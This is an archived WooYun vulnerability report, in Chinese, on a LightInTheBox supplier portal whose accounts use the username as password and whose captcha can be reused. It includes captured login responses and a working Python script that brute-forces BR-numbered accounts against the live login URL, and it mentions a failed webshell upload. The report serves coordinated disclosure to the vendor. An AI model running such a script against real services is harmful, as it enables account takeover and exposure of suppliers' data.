乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-22: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-07: 细节向公众公开
供应商信息泄漏,网站设计有问题
兰亭集势偶然得到的一个用户名密码一样,看了下网站可以遍历一下,验证码截断之后可以使用,有一定的限制时间,以BR1100为例子,前面两个字母不变,后面数字可以遍历。对于可以正确登陆的账号密码有两种回应
HTTP/1.1 200 OKServer: nginx/1.4.3Date: Sun, 20 Dec 2015 13:17:18 GMTContent-Type: application/json;charset=UTF-8Connection: keep-alivePragma: no-cacheExpires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-cacheCache-Control: no-storeSet-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Sat, 19-Dec-2015 13:17:18 GMTContent-Length: 75{"success":true,"detail":"ç»å½æåï¼","data":"/merchant/settled/home"}
上面这种可以登陆,但是会出现404错误,以BR1102为例子是这种情况。正确的登陆回应如下
HTTP/1.1 200 OKServer: nginx/1.4.3Date: Sun, 20 Dec 2015 13:21:44 GMTContent-Type: application/json;charset=UTF-8Connection: keep-alivePragma: no-cacheExpires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-cacheCache-Control: no-storeSet-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Sat, 19-Dec-2015 13:21:44 GMTContent-Length: 61{"success":true,"detail":"ç»å½æåï¼","data":"/welcome"}
然后使用burp suite不太熟悉,所以上Python,如下:
import requestsimport reimport jsons = requests.Session()header = { "Host": "supplierportal.litb-inc.com", "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/42.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": "http://supplierportal.litb-inc.com/metis", "Content-Length": "41", "Cookie": "JSESSIONID=FCB45F6A027EBB036330D22D1C295084; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh; action-message=null", "Connection": "keep-alive", "Pragma": "no-cache", "Cache-Control": "no-cache"}if __name__ == "__main__": f = open('/Users/xxxx/webtest/lan', 'w+') for i in range(1000,9999): u = '%04d' % i payload = {"email":'BR' + u, "password":"BR" + u, "captcha":"kf2x"} reponse = s.post(url="http://supplierportal.litb-inc.com/metis/login", data=payload, headers=header) # with open('/Users/xxx/webtest/lanting', 'w+') as f: if reponse.json().get('success') and reponse.json().get('data') == '/welcome': f.write(u + '\n') f.close()
前面两个字母不变,后门遍历出来的就是可以登陆的数字,这是数字为4位数的情况,在五位数的情况下也是可以的。
这是BR1111/BR1111帐户的情况,四位数的情况下我跑了309帐户,5位数的情况跑了455个,没跑完。商家后台可以修改商品的图片,价格(好像要经过人工审核),另外各种供应商的联系人、电话等。在尝试了后台上传图片,菜刀连不上,图片上传格式要求500*500,但是上传之后变成200*200,对这个不太熟悉,所以就没继续了。
验证码实效性有问题,默认帐户密码一样,需要改改。(我不懂,硬着头皮说的)
危害等级:中
漏洞Rank:5
确认时间:2015-12-24 18:28
此漏洞会让用户操作供应商数据,可能会造成数据混乱
暂无